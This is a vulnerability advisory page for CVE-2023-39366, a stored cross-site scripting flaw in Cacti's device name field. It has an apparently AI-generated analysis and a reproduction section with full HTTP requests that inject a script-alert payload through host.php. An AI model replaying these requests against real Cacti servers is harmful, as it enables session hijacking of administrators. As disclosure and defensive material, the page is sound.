Unrated severityNVD Advisory· Published Sep 5, 2023· Updated Feb 13, 2025

Stored Cross-site Scripting in data_sources.php through Device-Name in 'select' input in Cacti

CVE-2023-39366

Description

Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a Stored Cross-Site-Scripting (XSS) Vulnerability allows an authenticated user to poison data stored in the _cacti_'s database. These data will be viewed by administrative _cacti_ accounts and execute JavaScript code in the victim's browser at view-time. The data_sources.php script displays the data source management information (e.g. data source path, polling configuration etc.) for different data visualizations of the _cacti_ app. CENSUS found that an adversary that is able to configure a malicious Device name, can deploy a stored XSS attack against any user of the same (or broader) privileges. A user that possesses the _General Administration>Sites/Devices/Data_ permissions can configure the device names in _cacti_. This configuration occurs through http:///cacti/host.php, while the rendered malicious payload is exhibited at http:///cacti/data_sources.php. This vulnerability has been addressed in version 1.2.25. Users are advised to upgrade. Users unable to update should manually filter HTML output.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

Cacti (software)/Cactillm-fuzzy2 versions
<=1.2.24+ 1 more
- (no CPE)range: <=1.2.24
- (no CPE)range: < 1.2.25
osv-coords11 versions
pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.4 pkg:rpm/opensuse/cacti&distro=openSUSE%20Leap%2015.5 pkg:rpm/opensuse/cacti&distro=openSUSE%20Tumbleweed pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.4 pkg:rpm/opensuse/cacti-spine&distro=openSUSE%20Leap%2015.5 pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2012 pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP4 pkg:rpm/suse/cacti&distro=SUSE%20Package%20Hub%2015%20SP5 pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2012 pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP4 pkg:rpm/suse/cacti-spine&distro=SUSE%20Package%20Hub%2015%20SP5
< 1.2.25-bp155.2.3.1+ 10 more
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-2.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1
- (no CPE)range: < 1.2.25-bp155.2.3.1

Patches

Vulnerability mechanics

Root cause

"The application does not properly sanitize user-supplied device names, allowing them to be injected as JavaScript."

Attack vector

An authenticated user with 'General Administration>Sites/Devices/Data' permissions can configure a malicious device name via `host.php` [ref_id=1]. This malicious payload is then rendered on the `data_sources.php` page when viewed by an administrative user [ref_id=1]. The JavaScript code executes in the victim's browser at view-time, as the payload is stored in the database and displayed without proper sanitization [ref_id=1].

Affected code

The vulnerability exists in the `data_sources.php` script, specifically where the 'host_id' field is processed and displayed. The `draw_edit_form` function in `html_form.php` is involved in rendering the data, and the `$.fn.textBoxWidth` function in `layout.js` is called, which can execute the injected script [ref_id=1].

What the fix does

The advisory recommends either treating user-supplied information as plain text or escaping it using HTML entities to prevent it from being interpreted as code. For client-side JavaScript, it advises against appending user-controlled input directly into the DOM [ref_id=1]. Users unable to upgrade are advised to manually filter HTML output.

Preconditions

authThe attacker must be an authenticated user with 'General Administration>Sites/Devices/Data' permissions.
authThe victim must be a user with the same or broader privileges, including administrative accounts.

Reproduction

POST /cacti/host.php?header=false HTTP/1.1 Host: <HOST> User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 885 Origin: http://<HOST> Connection: close Cookie: Cacti=<COOKIE>

__csrf_magic=<CSRF TOKEN>&description=Local+Linux+Machine%3Cscript%3Ealert('host.php')%3C%2Fscript%3E&hostname=localhost=&poller_id=1&site_id=0&host_template_id=7&device_threads=1&snmp_version=0&snmp_community=public&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=-1&availability_method=0&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1&notes=Initial+Cacti+Device&external_id=&id=1&save_component_host=1&graph_template_id=5&reindex_radio_1=on&reindex_radio_16=on&snmp_query_id=3&reindex_method=0&action=save

GET /cacti/data_sources.php?action=ds_edit&id=8&debug=1 HTTP/1.1 Host: <HOST> Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36 X-Requested-With: XMLHttpRequest Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: <COOKIE> Connection: close

[ref_id=1]

Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

News mentions

No linked articles in our index yet.

cvss	0.000
epss	0.001
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000